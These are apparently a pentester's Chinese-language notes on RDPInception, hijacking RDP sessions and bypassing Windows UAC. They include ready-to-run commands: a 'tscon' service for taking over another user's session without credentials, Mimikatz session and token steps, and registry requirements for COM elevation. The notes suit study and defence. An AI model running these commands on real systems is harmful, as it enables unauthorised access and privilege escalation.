RDP Inception+RDP hijack+Bypass UAC(关防火墙、复制文件、执行文件)
- RDPInception:
*要求用户在连RDP时映射C盘 默认条件不满足
即RDP client c:\ -> RDP server \tsclient\c
未来可以研究 RDP clipboard/printer RCE来更广泛实现这种攻击
https://www.anquanke.com/post/id/101525
2. RDP Hijack
query user
方法1 在system权限下执行
sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#0"
net start sesshijack
不需要凭据即可切换到目标桌面
方法2 使用Mimikatz
ts::sessions
privilege::debug //system 权限
ts::remote /id:1
token::elevate //切换桌面
https://www.anquanke.com/post/id/101525
3. Bypass UAC
通过学习官方文档,发现COM Elevation Moniker的使用对COM组件有如下要求:
- 该COM组件被注册
- 注册位置在HKEY_LOCAL_MACHINE下,也就是说,需要以管理员权限注册这个COM组件才可以
- 注册表HKEY_LOCAL_MACHINE\Software\Classes\CLSID下需要指定三项键值
{CLSID}, LocalizedString(REG_EXPAND_SZ):displayName
{CLSID}/Elevation,IconReference(REG_EXPAND_SZ):applicationIcon
{CLSID}/Elevation,Enabled(REG_DWORD):1
复制文件COM:IFileOperation
结论:只要以(或者模拟成)可信的进程(如explorer.exe、powershell.exe),加载高权限的COM组件不会弹出UAC的对话框。